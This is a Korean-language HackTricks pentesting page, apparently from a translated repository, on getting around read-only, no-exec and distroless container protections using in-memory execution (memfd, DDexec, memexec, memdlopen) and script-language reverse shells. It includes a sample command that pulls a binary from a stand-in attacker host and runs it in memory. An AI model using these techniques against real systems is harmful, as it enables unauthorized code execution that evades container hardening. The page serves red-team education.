hacktricks/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless
2024-09-23 23:32:25 +00:00
..
ddexec.md Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md 2024-07-18 18:39:08 +00:00
README.md Translated ['binary-exploitation/libc-heap/README.md', 'binary-exploitat 2024-09-23 23:32:25 +00:00

FS 보호 우회: 읽기 전용 / 실행 금지 / Distroless

{% hint style="success" %} AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기
{% endhint %}

해킹 경력에 관심이 있고 해킹할 수 없는 것을 해킹하고 싶다면 - 우리는 인재를 모집합니다! (유창한 폴란드어 필기 및 구사 필수).

{% embed url="https://www.stmcyber.com/careers" %}

비디오

다음 비디오에서 이 페이지에 언급된 기술을 더 깊이 설명합니다:

읽기 전용 / 실행 금지 시나리오

리눅스 머신이 읽기 전용 (ro) 파일 시스템 보호로 마운트되는 경우가 점점 더 많아지고 있습니다. 특히 컨테이너에서 그렇습니다. 이는 ro 파일 시스템으로 컨테이너를 실행하는 것이 securitycontext에서 **readOnlyRootFilesystem: true**를 설정하는 것만큼 쉽기 때문입니다:

apiVersion: v1
kind: Pod
metadata:
name: alpine-pod
spec:
containers:
- name: alpine
image: alpine
securityContext:
      readOnlyRootFilesystem: true
    command: ["sh", "-c", "while true; do sleep 1000; done"]

그러나 파일 시스템이 ro로 마운트되더라도 **/dev/shm**는 여전히 쓰기가 가능하므로 디스크에 아무것도 쓸 수 없다는 것은 잘못된 것입니다. 그러나 이 폴더는 실행 금지 보호로 마운트되므로 여기에서 바이너리를 다운로드하면 실행할 수 없습니다.

{% hint style="warning" %} 레드 팀 관점에서 볼 때, 이는 시스템에 이미 없는 바이너리(예: 백도어 또는 kubectl과 같은 열거기)를 다운로드하고 실행하는 것을 복잡하게 만듭니다. {% endhint %}

가장 쉬운 우회: 스크립트

바이너리를 언급했지만, 인터프리터가 머신 내부에 있는 한 어떤 스크립트도 실행할 수 있습니다. 예를 들어, sh가 있는 경우 셸 스크립트를 실행하거나 python이 설치된 경우 파이썬 스크립트를 실행할 수 있습니다.

그러나 이것만으로는 바이너리 백도어나 실행해야 할 다른 바이너리 도구를 실행하기에 충분하지 않습니다.

메모리 우회

바이너리를 실행하고 싶지만 파일 시스템이 이를 허용하지 않는 경우, 가장 좋은 방법은 메모리에서 실행하는 것입니다. 왜냐하면 보호가 적용되지 않기 때문입니다.

FD + exec 시스템 호출 우회

머신 내부에 Python, Perl, 또는 Ruby와 같은 강력한 스크립트 엔진이 있는 경우, 메모리에서 실행할 바이너리를 다운로드하고, 메모리 파일 설명자(create_memfd 시스템 호출)에 저장할 수 있습니다. 이는 이러한 보호에 의해 보호되지 않으며, 그런 다음 exec 시스템 호출을 호출하여 실행할 파일로 fd를 지정할 수 있습니다.

이를 위해 fileless-elf-exec 프로젝트를 쉽게 사용할 수 있습니다. 바이너리를 전달하면 바이너리가 압축되고 b64로 인코딩된 스크립트를 지정된 언어로 생성하며, fd를 생성하여 create_memfd 시스템 호출을 호출하고 이를 실행하기 위한 exec 시스템 호출을 포함하는 지침이 포함됩니다.

{% hint style="warning" %} 이 방법은 PHP나 Node와 같은 다른 스크립팅 언어에서는 작동하지 않습니다. 왜냐하면 스크립트에서 원시 시스템 호출을 호출하는 기본 방법이 없기 때문입니다. 따라서 바이너리를 저장할 메모리 fd를 생성하기 위해 create_memfd를 호출할 수 없습니다.

또한, /dev/shm에 있는 파일로 정상 fd를 생성하는 것은 작동하지 않습니다. 왜냐하면 실행 금지 보호가 적용되기 때문에 실행할 수 없기 때문입니다. {% endhint %}

DDexec / EverythingExec

DDexec / EverythingExec 기술은 자신의 프로세스 메모리를 수정하여 **/proc/self/mem**을 덮어쓸 수 있게 해줍니다.

따라서 프로세스에서 실행되는 어셈블리 코드를 제어함으로써, 셸코드를 작성하고 프로세스를 "변형"하여 임의의 코드를 실행할 수 있습니다.

{% hint style="success" %} DDexec / EverythingExec를 사용하면 메모리에서 자신의 셸코드 또는 어떤 바이너리로드하고 실행할 수 있습니다. {% endhint %}

# Basic example
wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar

더 많은 정보는 이 기술에 대해 Github를 확인하거나:

{% content-ref url="ddexec.md" %} ddexec.md {% endcontent-ref %}

MemExec

Memexec는 DDexec의 자연스러운 다음 단계입니다. 다른 바이너리실행하고 싶을 때마다 DDexec를 다시 시작할 필요 없이, DDexec 기술을 통해 memexec 셸코드를 실행하고 이 데몬과 통신하여 새 바이너리를 로드하고 실행할 수 있습니다.

memexec를 사용하여 PHP 리버스 셸에서 바이너리를 실행하는 방법에 대한 예시는 https://github.com/arget13/memexec/blob/main/a.php에서 확인할 수 있습니다.

Memdlopen

DDexec와 유사한 목적을 가진 memdlopen 기술은 메모리에 바이너리를 로드하는 더 쉬운 방법을 제공합니다. 이는 의존성이 있는 바이너리도 로드할 수 있게 해줄 수 있습니다.

Distroless Bypass

Distroless란 무엇인가

Distroless 컨테이너는 특정 애플리케이션이나 서비스 실행에 필요한 최소한의 구성 요소만 포함하고 있으며, 패키지 관리자, 셸 또는 시스템 유틸리티와 같은 더 큰 구성 요소는 제외합니다.

Distroless 컨테이너의 목표는 불필요한 구성 요소를 제거하여 컨테이너의 공격 표면을 줄이고 악용될 수 있는 취약점의 수를 최소화하는 것입니다.

리버스 셸

Distroless 컨테이너에서는 정상적인 셸을 얻기 위해 sh 또는 bash를 찾을 수 없을 수도 있습니다. ls, whoami, id와 같은 바이너리도 찾을 수 없습니다... 시스템에서 일반적으로 실행하는 모든 것입니다.

{% hint style="warning" %} 따라서, 리버스 셸을 얻거나 시스템을 열거할 수 없습니다. {% endhint %}

그러나 손상된 컨테이너가 예를 들어 플라스크 웹을 실행하고 있다면, 파이썬이 설치되어 있으므로 파이썬 리버스 셸을 얻을 수 있습니다. 노드를 실행하고 있다면 노드 리버스 셸을 얻을 수 있으며, 대부분의 스크립팅 언어와 마찬가지입니다.

{% hint style="success" %} 스크립팅 언어를 사용하여 언어의 기능을 활용하여 시스템을 열거할 수 있습니다. {% endhint %}

읽기 전용/실행 금지 보호가 없다면, 리버스 셸을 악용하여 파일 시스템에 바이너리를 작성하고 실행할 수 있습니다.

{% hint style="success" %} 그러나 이러한 종류의 컨테이너에서는 이러한 보호가 일반적으로 존재하지만, 이전 메모리 실행 기술을 사용하여 우회할 수 있습니다. {% endhint %}

RCE 취약점을 악용하여 스크립팅 언어의 리버스 셸을 얻고 메모리에서 바이너리를 실행하는 방법에 대한 예시는 https://github.com/carlospolop/DistrolessRCE에서 확인할 수 있습니다.

해킹 경력에 관심이 있고 해킹할 수 없는 것을 해킹하고 싶다면 - 우리는 인재를 모집합니다! (유창한 폴란드어 필기 및 구사 필수).

{% embed url="https://www.stmcyber.com/careers" %}

{% hint style="success" %} AWS 해킹 배우고 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우고 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기
{% endhint %}